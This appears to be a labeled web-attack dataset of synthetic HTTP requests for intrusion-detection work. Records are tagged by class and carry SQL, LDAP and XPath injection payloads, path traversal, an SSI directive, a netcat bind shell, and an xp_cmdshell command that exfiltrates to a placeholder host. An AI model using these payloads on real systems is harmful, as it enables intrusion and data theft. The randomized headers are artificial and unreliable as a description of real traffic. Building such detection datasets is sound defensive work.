Max-Forwards: 4126
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Basic b3RkdDJlYTc6bWlhVG41RUE=
Authorization: Basic cmdjaXJiYWw6UnRsdHA=
Range: 2613-116,8-,0-
Referer: /aeb8/oogdfi4/a8fit/5eldk4we.rar
TE: chunked,gzip,gzip;q=0.3
Trailer: If-Modified-Since
User-Agent: Mozilla/3.5 (Machintosh; U; PPC Mac OS X 0.3; Ee-oe; rv:1.4.9) Gecko/81659031
UA-CPU: StrongARM
UA-Disp: 702,0024,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 569x3212
Via: 8.8 197.52.0.15:1, 8.2 179.204.73.161:620, 8.0 www.yreq.css
Transfer-Encoding: compress
Upgrade: Eubq/3.7
Warning: 841 177.253.103.43 "siish1237R9c5ebtn" "Mon, 07 Dec 09 02:26:19 UTC"
X-Forwarded-For: 2.2.77.25
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 45006
Start - Id: 37683
class: LdapInjection
PUT /vsock_streamXsam8_USiallD6Y/e7Co/Sh4shutdownLV7w4/rIl9qOmXi0XolI/elqW/deesh/ts/mMSi-LrYO0tgkTM/CNsDNZyd.gif? HTTP/1.0
Content-Length: 224
Content-Language: ojp,yViaui
Content-Encoding: identity
Content-Location: http://www.tqkeb.biz/6hax.html
Content-MD5: cDRlZWU3ZWlNVG9ubzhmZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 23 Nov 05 23:35:57 UTC
Last-Modified: Fri, 03 Mar 06 03:09:09 CET
Host: www.rctamn.it
Connection: oEl75zh2
Accept: application/postscript
Accept-Charset: gb2312;q=0.5, koi8
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 28.10.194.170
Cookie: qXrI-3w=a &fsam;alit=46qoNneEiqso;gmmwOSEnh=7esc;rs=ttesIgarph;udNs1aaaaxutpes=275855529;hldLewei=2GxF3T
Cookie2: $Version="2"
Date: Tue, 28 Mar 06 06:01:24 UTC
ETag: W/"_@vqRjVs1bA1_fJ"
Expect: 100-continue
From: 2tnped@tsctjtsnt.gov
If-Modified-Since: Sat, 08 Mar 08 22:34:11 GMT
If-Unmodified-Since: Tue, 07 Aug 07 12:24:47 UTC
If-Match: "hkOiEV@HRx-lGpBIRN"
If-None-Match: "gv4UFAO-hQSPizwFW"
If-Range: "lKoXUSCoHfbo_0kJ"
Max-Forwards: 336
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: NTLM SWlzM250b2VobmFpc3Jlb2Exb3RnaXpnaU5vYm1ucmVyYmQ5aU5FRGhzY3JqZGs=
Authorization: artndN iein9svf=ysroleo
Range: 6058-6,88-,-245437
Referer: /sE1na.pl
TE: chunked;q=0.8
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.0 (compatible; inf6j3w; Unix; rsZwiy)
UA-CPU: MIPS
UA-Disp: 533,555,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 940x1719
Via: uxedy/0.9 218.222.58.30
Transfer-Encoding: identity
Upgrade: ldon/1.3, oeCc/5.2, eia/8.5, wqT/7.2
Warning: 969 167.196.254.57 "stSi" "Fri, 23 Jun 06 14:48:23 CET"
X-Forwarded-For: 66.23.157.210
X-Serial-Number: 7386288464563322200
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

YFuGgV=933&msiaMstgas=9915798&tdttfhsee=7214)(&(objectClass=glm)(|(sn  =  eybx)(cn=r     J*))&saw=808467&p7shhaztvb=eEi%iIeytOe&4stfdaudtco2o4=70995826&hyYnn5rjln=436265677&bgme=hriinfme6ufrom

End - Id: 37683
Start - Id: 42875
class: OsCommanding
GET /nsGUeydkAak0OT7qR/ibCy/gv5.NrOfA0xiQ/lcrhffo/Nhavingin7/soieaynherrmxo0Ds/i7.LRthwnw4WAQqrADLU/lvpIu0yQ3UiHsOMC.asmx?s7aCncftib3S=+&vawleaeMd=42908057&6Sft=%7C+shell%28%22cmd++++%2Fc+++c%3AInetpubwwwrootMSISSnc.exe+-l++-p++++1840+++++-t++++-e+cmd.exe++%22%29++++%7C%27 HTTP/1.1
Host: 11.6.21.109
Connection: close
Accept: video/*;q=0.0, text/*
Accept-Charset: iso-8859-4, windows-1250, big5
Accept-Encoding: deflate;q=0.9, gzip;q=0.1
Accept-Language: *
Cache-Control: no-store
Cookie2: $Version="664"
Date: Mon, 10 May 04 13:49:14 GMT
Expect: 100-continue
From: n2zse0bo@tibsA.uk
If-Unmodified-Since: Sat, 28 Nov 09 19:04:30 UTC
If-Match: "WrK7_oiqfGVT@ZPe3UAC"
If-None-Match: "xWQK.kVf1cJCo0mdg"
If-Range: Wed, 28 Mar 07 09:17:43 UTC
Max-Forwards: 98
Pragma: zphtork=q
Proxy-Authorization: NTLM dXR3aHRseWlvb3Q0MXdzZDVsMnNvZG9mcnNzaG9nc2s=
Authorization: NTLM OWY2SnI2b2UxYWRwZUJucGNkckNzZGp0OXlsb2tpZ2VtdWlwbkRtcg==
Referer: http://www.uPpna.ch/wwkmnthe/rnoeesr.dll
User-Agent: 7tlc/0.5.8.0
Via: tseh/1.7 184.105.55.99
Transfer-Encoding: etso
Upgrade: llre/7.7, ldlseg/5.7
Warning: 973 www.a2Mltbl.jpeg "ycengdeih" "Sun, 20 Nov 05 15:07:42 CET"

null

End - Id: 42875
Start - Id: 35981
class: PathTransversal
GET /nhdaBleswi/btgCLkZ9U/ofs/laCwHN.p/ayaplaonytndnrmeagr.htm?ftd3ea27r=tO64UzS HTTP/1.1
Host: www.suemuuizl.ch
Connection: oos5nh
Accept: */*;q=0.6
Accept-Charset: us-ascii;q=0.3, windows-1250;q=0.2, windows-1258;q=0.0, windows-1250;q=0.9
Accept-Encoding: compress, deflate, gzip;q=0.8
Accept-Language: *
Cookie: sspnoea9tcyol=;ei66c4position1i;eepyioiozarra=sam%us%$1e;GjeMnadln6o=/../../../../../../../Inetpub/iissamples/onsiarge/ngtand/tiicte/ratero.php3
Cookie2: $Version="6"
Expect: ebtp=iLio
If-Modified-Since: Thu, 05 Nov 09 12:53:27 GMT
If-None-Match: *
Authorization: Basic cnl1YW9oc2U6YmU2aW0=
Referer: /aolea/rAcb/ni8ics.pdf
User-Agent: Mozilla/4.1 (Windows; U; Win98 0.4; na-tr; rv:6.9.3) Gecko/42508259
UA-Disp: 3180,2495,16
Via: FTP/9.9 www.ppUteee0.shtml:4, FTP/3.4 238.139.177.222, 3.4 www.wetn0eet.jpg
Transfer-Encoding: deflate

null

End - Id: 35981
Start - Id: 41863
class: SqlInjection
GET /icmrweeoctqtae1d/thtr/tgiv/pn5onteFcc/xOs8Eihm/itsod73ersyocOempel/kKLMvO/hcIinOw/ooIzRlte9r9oe/efenpnj3/bF0SPIW7.png?teene6Amccrshl=1430&T2zshitasueiueo=ae%40sePeTdl&ynfe=92922&iNu=%27+++%29+++++UNION+++++ALL++SELECT+++++rmrt+++++FROM+++rdefoeiwp++++WHERE+%28++++%27%27+++%3D%27&tePmgBTlp4eh=sIhUe&.NlinkBsgdVCc=81524837&F3k6MjJ1q=sa%40ZGJ_EaNa- HTTP/1.0
Host: 125.85.9.66:80
Connection: sFsHen
Accept: text/html, video/*;q=0.7
Accept-Charset: *;q=0.4
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: min-fresh=7544
Client-ip: 91.138.91.59
Cookie: dnaeqDiQu=cn;h8rr=welsoaheo5cea;7sahmohe=ilp
Cookie2: $Version="72"
Date: Wed, 04 Oct 06 05:58:24 CET
ETag: W/"NB8ujNmt0uyX._sVfglF"
Expect: hbnaeaon=kuEqf
From: alubns@ssude.cz
If-Modified-Since: Thu, 30 Apr 09 10:46:23 CET
If-Unmodified-Since: Sat, 06 Sep 08 03:08:14 UTC
If-Match: "xaUZu4e300qoa_gd3qG"
If-None-Match: *
If-Range: Thu, 10 May 07 07:46:54 GMT
Max-Forwards: 38
MIME-Version: 7.2
Pragma: s2fteeu=orslca
Proxy-Authorization: 9e2te epmr=aedBepse
Authorization: cerhke srest=lwcshsc
Range: -521,-331719
Referer: http://meOmaeoe.com/hchrwi8/Fcouxd6/bazva/Rmataet.pl
TE: gzip;q=0.5,trailers
Trailer: If-Unmodified-Since
User-Agent: lanW2ot
UA-CPU: PowerPC
UA-Disp: 0650,9249,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 698x973
Via: FTP/6.8 www.Qnreyt.htm, HTTP/2.8 224.17.178.85
Transfer-Encoding: gzip
Upgrade: i1en7/5.4, wsdt/7.7
Warning: 532 103.218.114.157 "eqF8dbfeC" "Sat, 29 Jan 05 05:14:55 CET"
X-Forwarded-For: 123.208.82.116
X-Serial-Number: 8017409
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41863
Start - Id: 41639
class: SqlInjection
GET /GbQE/auz/9rdAmiqbiRop/ewT4Ji9H.k7ODbFiR/LCCall3e/nAzeod/ri/akQa.QVJmVIOvTe/Va056oGw/rntsU_gdGdxNf1p/qldbirNshss/4em.cgi?Rl=alkb59S94prH&peiiy=%27+%29+++UN%2F**%2FION+++ALL+++SEL%2F**%2FECT+++%27trl0Tc%27%2C2631%2C547%2C%27ncgm%27%2C9+++++FROM++++hu+++++WHERE++++%28%27%27++++%3D+++%27&oanea=group+bya&0r-m=rsh%25ysirtia%27m%25n&xNaiouhE2n4=t%29evaraF&nsrfrba=4atV&hCihservicesa=deheksorm HTTP/1.1
Host: 251.13.149.204
Connection: close
Accept: audio/x-wav;q=0.4, video/quicktime;q=0.0, video/quicktime
Accept-Charset: *
Accept-Encoding: gzip
Accept-Language: oete-o, i-e;q=0.0
Cache-Control: no-store
Client-ip: 250.22.146.196
Cookie: e5rtapon=9710404
Cookie2: $Version="408"
Date: Sun, 11 Sep 05 05:22:58 GMT
ETag: W/"hmTxEJ5FkJRToMJo."
Expect: 100-continue
From: vlIol@haea.org
If-Modified-Since: Mon, 14 Dec 09 06:24:53 UTC
If-Unmodified-Since: Thu, 12 Apr 07 15:53:26 CET
If-Match: "YfyF@F3US0_N7MgD5oI"
If-None-Match: "@@0ePc4vYQG8BPHB"
If-Range: Sun, 04 Sep 05 20:15:18 UTC
Max-Forwards: 2
MIME-Version: 5.2
Pragma: n3husvoA='rp'
Proxy-Authorization: NTLM bG5sc2NhT05hdHJyZnVhRWljaWVub3B4eThwc2hUaWhocmgxb2FnYnRiMXo1dw==
Authorization: NTLM M2FlaG93aWx5Y2Vqbm90dGVlaWNlbndhcHBvaXZzdVJhc2NmYnlhYQ==
Range: -11289
Referer: http://Ae4Obo6.uk/le2iiz/5eyh/Bv42tOr2/sbMhAtt/ectht.nsf
TE: deflate
Trailer: Upgrade
User-Agent: Mozilla/2.8 (X11; U; Unix 2.1; an-fw; rv:2.6.7) Gecko/36713593
UA-CPU: Sparc
UA-Disp: 041,9154,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 064x464
Via: HTTP/9.4 www.OgryiNel.png:3
Transfer-Encoding: gzip
Upgrade: liaory/2.2, awo4ag/4.5, oil/7.5, ctOl/2.3, see/4.6
Warning: 419 www.riae.jpeg "t4xtspnneyygypw1bdf" "Thu, 20 Aug 09 21:25:22 GMT"
X-Forwarded-For: 239.30.161.125
X-Serial-Number: 215683669428
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 41639
Start - Id: 49514
class: XPathInjection
GET /eQf5IzAaWnGL3iN2.js?UeaEro=u9z&tu=sTskt&erihmnd=562695&nsee=audNOySXe&ooomkpS=e%400Zj2-&i2oiRv7iasR=04912&hnylissipY1serR=28&rttsoc=uui9aenD2ldt&3syayi5qNwiid=0610780148&ooehdr4ng=h&wHtuIr=669+++++or+++++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D+++++%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++or++53766%3D&lP0kEn.1p=5729&eEurlWeo=27826905&dJexec3=udhzuvaveor%3Ai9q HTTP/1.1
Host: www.p6ihN.net
Connection: close
Accept: text/plain;q=0.4, application/x-tar, application/*;q=0.1
Accept-Charset: iso-8859-1;q=0.5, hz-gb-2312, x-mac-korean;q=0.6
Accept-Encoding: 
Accept-Language: i-ry, 2h0hw-hmb5
Cache-Control: only-if-cached
Client-ip: 202.44.218.0
Cookie: iettce5yihow=8;ClinkRadmin=28o;teneye6hhkst=qMMaB;OdNpur_e=680405795;ricbtwser=en;snjlatt=s8e@[ai
Cookie2: $Version="988"
Date: Thu, 21 Jan 10 13:54:22 GMT
ETag: "yazn.m53BeI7lvtipfFN"
Expect: igeeah=za6rsomx;otXlia7e
From: eaatpaso@ksiwaan.org
If-Modified-Since: Mon, 03 Aug 09 17:33:16 UTC
If-Unmodified-Since: Wed, 17 Mar 10 23:13:04 CET
If-Match: "yrIQ92TyCN41oG5-D4hS"
If-None-Match: "_b4ZC9NdaVMRsUBjNa"
If-Range: *
Max-Forwards: 22
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: ao6tbr qsmelsdm=S7mcd8of
Authorization: Digest response="9BB6B27FDc09F001de66A19b5ca82987"
Range: -88469
Referer: http://goeo.net/qn0jpts/fseNntec.msf
TE: gzip;q=0.2,gzip
Trailer: Date
User-Agent: Mozilla/9.0 (X11; U; Unix 9.7; tn-eo; rv:0.7.0) Gecko/86194288
UA-CPU: Sparc
UA-Disp: 2924,8513,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 7997x438
Via: i3l/7.4 92.76.229.198, Inx5f/1.2 www.te9N.jpg
Transfer-Encoding: identity
Upgrade: itnn/7.0, e8wien/4.6, 6sde2/3.7, niNg/1.6
Warning: 646 www.qqkiis.css "nsutrl9tXaNtumo" 
X-Forwarded-For: 224.66.157.216
X-Serial-Number: 201583507
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 49514
Start - Id: 37887
class: LdapInjection
GET /bDH-1ZsguO29N/hO@A/Im3BK43J3/TTegetu/xcpe0TIbr3MJfgde/p0dT/oqPQEqEvBO0TgSjjY2Yw/gnatad/SCidkSincludeP5Rtjfhb/tL6nh/dmbcOpI9xgr83/n_.cgi?nesrdwi=EeoAilnyafie&Eresal3ite=sjh&NewgtBtrO3oqt=AlgNyt&qHtn8se1msee=etitfhfrZacceptaXs&edelUelgiljc=01428376&eahq=syimg&sointcviae5Mx=tSmeta%40%25rwEos%25u&Oo=%29%28+%7C+++%28++cn%3D*o+%27brien*++++%29%28mail++%3D*o%27brien*++++%29++&no=ahah&9azl=ehcNH1C8wd&Hatqwigiei=tAerc&dM=erjbi8&TsNrtIThh=bpt56Jj HTTP/1.0
Host: 94.152.244.100:80
Connection: close
Accept: audio/basic;q=0.8, image/*;q=0.0, application/zip;q=0.7
Accept-Charset: windows-1255, iso-8859-7, x-mac-roman
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 209.154.70.239
Cookie: 7Dr=nm;ejL1XZ=028;mr=1;yqoIc=tVuhl1Maz5i;eb2dfrds9Es=50
Cookie2: $Version="4"
Date: Wed, 08 Feb 06 11:15:27 UTC
ETag: W/"pNxix-WiJNQLVltQ"
Expect: ooauyOdi
From: pyeere9e@rgid7rnosp.be
If-Modified-Since: Wed, 14 Sep 05 03:41:56 UTC
If-Unmodified-Since: Wed, 21 Feb 07 06:54:15 GMT
If-Match: "m52lgc36FopxNka"
If-None-Match: *
If-Range: Sat, 13 Sep 08 06:11:14 CET
Max-Forwards: 12
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Basic ZXNtaGFTOmF4dWVl
Authorization: Digest nc=ebfc4BaD
Range: 41-534098,-55
Referer: http://www.aqEm2aii.it/w6nntp.jsp
TE: trailers
Trailer: Authorization
User-Agent: ccohgHse0Etoew
UA-CPU: Sparc
UA-Disp: 322,606,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 649x451
Via: 5.5 34.218.223.96, 7.2 www.edda.jpg, 5.6 57.199.50.218
Transfer-Encoding: identity
Upgrade: tcig/4.0, RShRui/9.0, srvafl/9.7, nklzey/9.3
Warning: 941 www.iehcba.gif:913 "elrrSd" 
X-Forwarded-For: 146.237.137.95
X-Serial-Number: 9686105266248523
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37887
Start - Id: 35470
class: XPathInjection
GET /evooxe/niP-UHtbghQgGxAf2D/u69.LQ/rededtebsheprafeis/w2zTMjHuosV-vpZ/5_g_8Z@4Br8/oLtXB2/1Zt6nIVctwA/iC0pxVf729HqUo.php4? HTTP/1.1
Host: www.nsl0eIu3.ch
Connection: close
Accept: audio/*;q=0.5, image/*;q=0.4, application/*
Accept-Charset: iso-8859-8;q=0.0, euc-cn;q=0.5, iso-8859-15, x-mac-greek
Accept-Encoding: 
Accept-Language: 2eiitjet-3zorem3;q=0.3, t-ams;q=0.1, wrsedmd-i, gtn-sg, tnint-roe1oFt
Cache-Control: no-store
Client-ip: 39.164.202.129
Cookie: ttiia=n6t 1asi
Cookie2: $Version="6"
Date: Sat, 10 Dec 05 17:17:50 UTC
ETag: "dFInZO7AAV.iTnAMyce"
Expect: miaNLadt=haay
From: stma@chhsenn.cz
If-Modified-Since: Mon, 08 Dec 08 14:23:10 UTC
If-Unmodified-Since: Fri, 12 Mar 04 21:46:29 UTC
If-Match: "z0PcAPaNHyLofY_"
If-None-Match: "0ycONj4BbWQXqmG3G4_4"
If-Range: Wed, 09 Nov 05 22:32:22 GMT
Max-Forwards: 9
Pragma: sifA='92ie'
Authorization: NTLM dGhuY3JjaW8yZ2VpdGlmZ3Rlb2VhVGthaHhjdHNodDN1
Referer: /leRsrnSs/e6aixmke/efogrino/efaant1s.shtml
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: aa7pnO']    |   P     |    //user[    name/text( )   ='wtT
UA-CPU: StrongARM
UA-Disp: 8678,966,8
Via: 9.2 253.72.189.91, bvoOu/7.2 www.egagh.png
Transfer-Encoding: 0meL
Warning: 084 www.rse4aa.htm "nhtTetlnisasnnesic" "Thu, 10 May 07 21:23:05 UTC"

null

End - Id: 35470
Start - Id: 40848
class: SSI
GET /dyCM55N3qpa64dip1Z/o8nZllM8ki.vYhewsv/oI0D0s/f9cEQ/b_EbURd/weeseiplh3yeAotglp/vO/t.fob7Y32bVtu-mlG_/vI2DAturtNlr6r9o/es/rPmveB6x/lsnk.htm?passthruURAQEL=eh&ttdOc=931867100&bTshehtxem=%5CfoOSqtRcservicesra4l%5BN&ufygeTdrre9=18&aohnpmnLqembYey=770231&yatr=lmTeeheo&Cif3l=w_15VVrj9KG&tddxtssNihi5u=dyjmtevf&eDaNd5igat9olaw=%3C%21--%23odbc++statement+++%3D+%22select++te%2C++++6m1oieeh%2C++++grotnwsU++++from+++++nibhbOhool+++order+++++by++8%2C+687%2C+9%22+++++--%3E&stdinJkrGjKZlbEZ=t3Ji&Jetcq8d=niv&oallDZtmpkM3Y=%40s%2Blba%2B&ik0=32096365&rwi=rhaprocessing-instruction HTTP/1.1
Host: 163.186.0.244
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.3
Accept-Encoding: identity;q=0.3, gzip;q=0.3, identity;q=0.6, gzip;q=0.2, deflate;q=0.0
Accept-Language: e1To-iHOi
Cache-Control: no-store
Client-ip: 183.188.60.40
Cookie: 6eeH=227464225
Cookie2: $Version="5"
Date: Sun, 27 Sep 09 20:05:50 CET
ETag: "c4DJWXpb1.Q0Ita"
Expect: hw5e
From: ttntvsh@tetyoEibr.uk
If-Modified-Since: Wed, 10 Sep 08 15:57:11 GMT
If-Unmodified-Since: Sat, 23 Sep 06 09:09:55 UTC
If-Match: "WD4Y3yYdXzMK1.8jb"
If-None-Match: *
If-Range: Wed, 12 May 04 18:12:06 CET
Max-Forwards: 587
MIME-Version: 1.5
Pragma: owspp='oe2s7k'
Proxy-Authorization: Digest cnonce="li7or"
Authorization: Digest response="cEb6DD0aCD503BCcB8d61C8bF90B183f"
Range: 68-,5-
Referer: /a9euaa/toqsyu/eBhaylm.asmx
TE: trailers,trailers,trailers
Trailer: Date
User-Agent: Mozilla/5.8 (Windows; U; Win 9x 8.3; ii-Tg; rv:8.6.3) Gecko/85241039
UA-CPU: PowerPC
UA-Disp: 2426,7787,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 266x239
Via: HTTP/3.4 72.140.155.25, 6.3 32.107.10.68, HTTP/8.1 www.svms.png
Transfer-Encoding: deflate
Upgrade: iTdaap/8.9
Warning: 587 136.89.138.222 "srssp" "Sun, 31 Dec 06 15:59:03 UTC"
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 49586702317462
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40848
Start - Id: 42439
class: SqlInjection
GET /ar47p-.asmx?eniame1t=n%402Yt&alE8a0dr4esmph=bO&ld=%5Caoreplaceeivcl&92SPIJz-=k%3BcopyS&QkwD3RSSpB=%27%3B+insert++++into++Rn5tegnR+++values%28666%2C%27mee%27%2C%27nng4vht%27%2C0xfffff%29&ic0toszhrzcShy=mr%3Blau HTTP/1.0
Host: 87.140.69.215
Connection: eoloo
Accept: */*
Accept-Charset: iso-2022-jp;q=0.9, hz-gb-2312;q=0.3, x-mac-hebrew;q=0.7, windows-1258;q=0.1
Accept-Encoding: 
Accept-Language: ur-ftat;q=0.9, na4hc-chaetDt, tyo1-Rjoshalt, oarh-ehttgTtr;q=0.0, 2o-o;q=0.2
Cache-Control: no-transform
Client-ip: 240.161.64.35
Cookie: cruyna=sR;nFeDaoynpliR=ht)updatea;hiihf=34008;ksvblanu5p2ty=l;nIa]tTAdyui;atrc:;iyno=52718;X2Skg488d=kaodxAhhsro
Cookie2: $Version="2"
Date: Mon, 23 Jul 07 06:30:07 CET
ETag: W/"OW_oBv4XGNtza5TpHP"
Expect: 100-continue
From: hraer@erUscu.ch
If-Modified-Since: Thu, 19 May 05 10:03:16 GMT
If-Unmodified-Since: Thu, 30 Jun 05 09:11:11 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 23 Apr 06 24:55:53 UTC
Max-Forwards: 864
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Basic aHdkZWQ6dDVtbjYzb1M=
Authorization: Basic ZXllaVRoczY6bHNvM2k=
Range: 53-,-2932
Referer: /isoom/wtftN1e/syctw/sztWur6.cgi
TE: chunked;q=0.5,gzip;q=0.5
Trailer: Authorization
User-Agent: Mozilla/7.3 (Windows; U; Win98 7.4; od-eu; rv:3.8.1) Gecko/15068985
UA-CPU: PowerPC
UA-Disp: 807,741,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 028x6235
Via: 5.1 www.foetac.png, HTTP/6.6 109.95.108.194:0308
Transfer-Encoding: deflate
Upgrade: 5ues/5.0, s5cxlt/6.5
Warning: 292 www.ev6O.jpeg "hnt5llemsftyrettr" 
X-Forwarded-For: 120.46.59.231
X-Serial-Number: 2317427
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42439
Start - Id: 37692
class: LdapInjection
POST /sY8riUzqih/coOAextvmtnR/HF2/ia2i0nerikMbOhn/oRxqhongsb3/ak@.msf? HTTP/1.1
Content-Length: 282
Content-Language: ewn4,Oiojtmxi,writ
Content-Encoding: identity
Content-Location: /aNhrme/liebprc.conf
Content-MD5: czQ5YWhzdWFhaXNoaXJyNA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 12 Apr 08 10:41:37 UTC
Last-Modified: Mon, 14 Apr 08 24:58:52 UTC
Host: www.6uoeslsaca.com
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: koi8;q=0.2
Accept-Encoding: 
Accept-Language: evnr8-lPuea;q=0.9, t-eaL, gtm-ecEa2, teaey-sreimt, ae4eoee-o
Cache-Control: max-stale
Client-ip: 28.10.194.170
Cookie: arm@%un3uQNk=8;xpmatpkaemOtl=naG7M;eR=rrt%7E%25sata0n4ei
Cookie2: $Version="49"
Date: Sun, 27 Jun 04 15:07:54 GMT
ETag: W/"MMz6nJo0JmIGI1uG"
Expect: 100-continue
From: 2tnped@tsctjtsnt.gov
If-Modified-Since: Wed, 22 Oct 08 20:18:25 GMT
If-Unmodified-Since: Wed, 10 Jan 07 04:59:31 GMT
If-Match: "M4sBFXsvPc1TBlTj"
If-None-Match: "ZG5C1BkDd_u7QIATMlT"
If-Range: "VzRTpI_OST6L736gzuR"
Max-Forwards: 1
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: NTLM bTRhZWRxbDBkaWhlcmFydXJtSGVvMWN0cHJlZWNuZG1lamVsbw==
Authorization: tdzb to2mOt=teiOOsx
Range: 6058-6,88-,-245437
Referer: /oe2trr.js
TE: chunked,gzip;q=0.3,deflate
Trailer: Transfer-Encoding
User-Agent: nrsfuuhe1wdVr
UA-CPU: MIPS
UA-Disp: 533,555,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 940x1719
Via: 0.7 www.Ejegowze.js
Transfer-Encoding: identity
Upgrade: 9aoe/3.6, dao/3.0, ucnVit/7.1, erAr/4.2
Warning: 484 www.deUipro.gif "e0dtetkswncqigno" "Thu, 04 Feb 10 17:35:52 CET"
X-Forwarded-For: 66.23.157.210
X-Serial-Number: 3901331377594
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nelie=f3I&Catuhhatcm=)   (|    (displayName=had*)(name=  had*    )(mail=had*    )&uar=315825&eiauhnune3c=wXrb&ime4ySst=s4nnata 9&JIMSNzHn=73ssigeaaeottm0d&s0to=atfia23tjr+ctwhereZ&2olr9phr1Dc=660614&au51su=elca4tslN&ypk=63&euAsiooUtolsev=EceeyedexaNlosnyce

End - Id: 37692
Start - Id: 41063
class: SqlInjection
GET /rr2api.tiff?ha6i4btn3hzri0=3&DSclocaofr=i%3Feuilltwmw&e3el=l&fi79lSamtthr=exec+++++xp_cmdshell+%27bcp++++%22select++*+++++from+++++ifthRuemn%22++queryout+++pwdump.exe++-c++++-Craw+++-Shackersip+++-Usa++-Ph8ck3r%27&nia2tnh=76187 HTTP/1.0
Host: 162.19.180.33
Connection: ichqovo
Accept: */*;q=0.2
Accept-Charset: windows-1258
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 29.8.160.212
Cookie: uqnfoAE0ooq=36979861;2p=8echoe5s\ae
Cookie2: $Version="53"
Date: Thu, 04 May 06 14:53:06 CET
ETag: "x.hbUQbHgkte8ldBa7p"
Expect: ttrhbztf
From: whnti@gvae.gov
If-Modified-Since: Wed, 19 Mar 08 23:17:34 GMT
If-Unmodified-Since: Fri, 04 Apr 08 19:38:00 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 21 Mar 05 20:13:07 GMT
Max-Forwards: 878
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: NTLM c3RhdnNuaU9hMWF0VHRnczFzMTF0N29wZWl4d2NlTG5ubg==
Authorization: Basic YjdJdG1uOmVvYXRPNDI=
Range: 7-04,570-
Referer: http://www.NhaiRsp.fr/bEtaeyaT/eurEe/Nutlor3s/ocEtme1a/veoun.zip
TE: trailers,deflate
Trailer: Max-Forwards
User-Agent: hlyckvY/4.6.3.8
UA-CPU: PowerPC
UA-Disp: 2063,773,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 7677x541
Via: FTP/5.9 www.2ehn.tiff, stIy/3.8 132.91.84.197, 8.7 21.228.69.137
Transfer-Encoding: deflate
Upgrade: uohtr/6.5, oeo/0.4
Warning: 929 33.62.91.208 "gsh7lfen" 
X-Forwarded-For: 32.32.219.84
X-Serial-Number: 54708069609443708
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 41063
Start - Id: 49958
class: XPathInjection
GET /e5p0snuoweroi0d8od/uwindow.openLPobject7Mf9/r3KqXW70Dw3ljhK/tooeteva3a496u/UEv3gEN3/tumiPXCJRJagQ_BSiSg/gttuEn2bnsBul7soeiu/aptnsNeVanmseege/jselrwNagasbrteRa/OE9orpSj8zuznullAxbin/alesnio7e1/qhsoanoipeknbevne6Oi.asp?igsoEssmnaihne=cmtUnOgisb4haddaso&et2o0umeAAiia2e=y5irr&hnhdebhzo0=tu%24e5gew3e+mochans&nqcAorr=678737&un1Satwanni3uq7=nheie%7Citcupdatej+pe6t+4ue&nkmXcAew=wl3a+&Kl77LPR0=5aS.FH5x&ltbeotiro=768544342&id9aierzfjidoee=++n&ntd=leuH56s%27+++or+++++6+++++%3C+++++count%28path%2Fchild%3A%3A*%29++++or+++++%27yg4s5aie%27+%3D+++%27 HTTP/1.0
Host: www.tsfEb5.com
Connection: close
Accept: */*
Accept-Charset: x-mac-arabic, shift_jis;q=0.4, iso-8859-1
Accept-Encoding: *
Accept-Language: 1Tiyuce-5oglgfei;q=0.3, HgTg9-faaEamw, 3tjlhNr-Ctooer
Cache-Control: min-fresh=0774
Client-ip: 178.2.112.138
Cookie: Z@VCO8LlS=raee2in8;ptAsmndesol=67;ihceaeazteyRoo=hm|sno;Alr9l=477514
Cookie2: $Version="215"
Date: Mon, 17 May 04 23:55:48 UTC
ETag: W/"hQ4l.RD7dOpBmeEgodH"
Expect: 100-continue
From: ekeat@ojhpuenrL.gov
If-Modified-Since: Fri, 01 Apr 05 20:36:26 UTC
If-Unmodified-Since: Tue, 02 Mar 04 01:13:48 UTC
If-Match: "LuDVa6_sjW-GmmPL"
